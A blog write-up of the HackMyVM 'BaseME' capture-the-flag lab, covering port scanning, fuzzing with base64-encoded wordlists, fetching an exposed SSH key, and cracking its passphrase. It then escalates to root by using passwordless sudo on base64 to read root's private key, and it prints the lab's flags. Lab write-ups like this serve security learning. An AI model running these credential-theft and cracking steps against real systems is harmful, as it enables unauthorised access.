0xBEN
/
Sign up to 0xBEN!
Already have an account? Sign in

HackMyVM | BaseME

In this walkthrough, I demonstrate how I obtained complete ownership of BaseME from HackMyVM
0xBEN
5 min read
HackMyVM | BaseME
https://downloads.hackmyvm.eu/baseme.zip
In: HackMyVM, Attack, CTF, Home Lab, Linux, Easy Challenge
ℹ️
I keep all of my distrusted hosts from platforms like HackMyVM on a segmented VLAN -- 10.9.9.0/24 -- that has no internet access

Nmap Results

# Nmap 7.94SVN scan initiated Thu Nov 14 20:20:18 2024 as: /usr/lib/nmap/nmap -Pn -p- --min-rate 2000 -sC -sV -oN nmap-scan.txt 10.9.9.16
Nmap scan report for 10.9.9.16
Host is up (0.00039s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 ca:09:80:f7:3a:da:5a:b6:19:d9:5c:41:47:43:d4:10 (RSA)
|   256 d0:75:48:48:b8:26:59:37:64:3b:25:7f:20:10:f8:70 (ECDSA)
|_  256 91:14:f7:93:0b:06:25:cb:e0:a5:30:e8:d3:d3:37:2b (ED25519)
80/tcp open  http    nginx 1.14.2
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: nginx/1.14.2
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Nov 14 20:20:31 2024 -- 1 IP address (1 host up) scanned in 12.91 seconds





Service Enumeration

TCP/80

Better viewed with curl due to the long output
Using curl, head, and base64 to decode the message
ℹ️
ALL that you need is in BASE64

At this point, my attack path is leaning towards the iloveyou, youloveyou, shelovesyou word list needing to be base64-encoded and sprayed at SSH in some combination.

Or... it's possible that some part of the the URL on http://10.9.9.16/, or a parameter or header, is going to have the word BASE64 or some variation of casing in it.

But none of these things are working for me at the moment when fuzzing it. So, my next idea is to base64-encode the iloveyou, youloveyou, shelovesyou word list and spray each word at http://10.9.9.16/{base64-encoded-word-here}. But again ... this didn't work for me, so maybe we just need a better word list.
cat /usr/share/seclists/Discovery/Web-Content/big.txt | 
xargs -d "\n" -I {} -n 1 -P 200 bash -c 'echo "{}" | basenc --base64url' > b64.txt

Take each word in the big.txt word list, base64-encode it, and create a new word list

gobuster dir -u http://10.9.9.16 -w b64.txt -o baseme.txt -t 100
🥲
ℹ️
Not a win, but I sense that we're on the right track
cat /usr/share/seclists/Discovery/Web-Content/combined_words.txt | 
xargs -I {} -P 200 -n 1 bash -c 'echo "{}" | basenc --base64url' > b64.txt

Try a different word list

Very interesting ...





Exploit

Obscurity is not Security

Base64-encoded URLs were used to obscure sensitive files on the web server. And, one such file happened to be a SSH private key for lucas, presumably.

curl -s http://10.9.9.16/aWRfcnNhCg== | base64 -d > id_rsa
chmod 400 id_rsa
ssh -i id_rsa lucas@10.9.9.16
The SSH private key is password protected. We can try and crack it with ssh2john.
ssh2john id_rsa > hash
⚠️
I tried cracking the id_rsa hash using rockyou.txt with john, but it was taking a while, so I figured something was off. Perhaps, we need another base64-encoded word list.

🤔 What if the word list in the HTML comment is the word list we need?
for w in $(cat list.txt); do echo -n "$w" | base64 ; done > list_b64.txt
john --wordlist=list_b64.txt hash
aWxvdmV5b3UK
We're in!





Post-Exploit Enumeration

Operating Environment

OS & Kernel

PRETTY_NAME="Debian GNU/Linux 10 (buster)"
NAME="Debian GNU/Linux"
VERSION_ID="10"
VERSION="10 (buster)"
VERSION_CODENAME=buster
ID=debian
HOME_URL="https://www.debian.org/"
SUPPORT_URL="https://www.debian.org/support"
BUG_REPORT_URL="https://bugs.debian.org/"

Linux baseme 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64 GNU/Linux

Current User

uid=1000(lucas) gid=1000(lucas) groups=1000(lucas),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)

Matching Defaults entries for lucas on baseme:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User lucas may run the following commands on baseme:
    (ALL) NOPASSWD: /usr/bin/base64



Users and Groups

Local Users

lucas:x:1000:1000:lucas,,,:/home/lucas:/bin/bash

Local Groups

cdrom:x:24:lucas
floppy:x:25:lucas
audio:x:29:lucas
dip:x:30:lucas
video:x:44:lucas
plugdev:x:46:lucas
netdev:x:109:lucas
lucas:x:1000:



Network Configurations

Network Interfaces

ens18: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
    link/ether bc:24:11:25:3a:82 brd ff:ff:ff:ff:ff:ff
    inet 10.9.9.16/24 brd 10.9.9.255 scope global dynamic ens18
       valid_lft 4276sec preferred_lft 4276sec
    inet6 fe80::be24:11ff:fe25:3a82/64 scope link 
       valid_lft forever preferred_lft forever





Privilege Escalation

Privileged File Read

During the post-exploit enumeration phase, we find that lucas has password-less sudo privileges on /usr/bin/base64 which can be used to read any file as an input source.

sudo /usr/bin/base64 /root/.ssh/id_rsa | base64 -d > ~/root_key
chmod 400 ~/root_key
ssh -i ~/root_key root@localhost



Flags

User

HMV8nnJAJAJA

Root

HMVFKBS64
Written by
0xBEN

0xBEN

View all posts
Comments
More from 0xBEN
Table of Contents
Great! You’ve successfully signed up.
Welcome back! You've successfully signed in.
You've successfully subscribed to 0xBEN.
Your link has expired.
Success! Check your email for magic link to sign-in.
Success! Your billing info has been updated.
Your billing was not updated.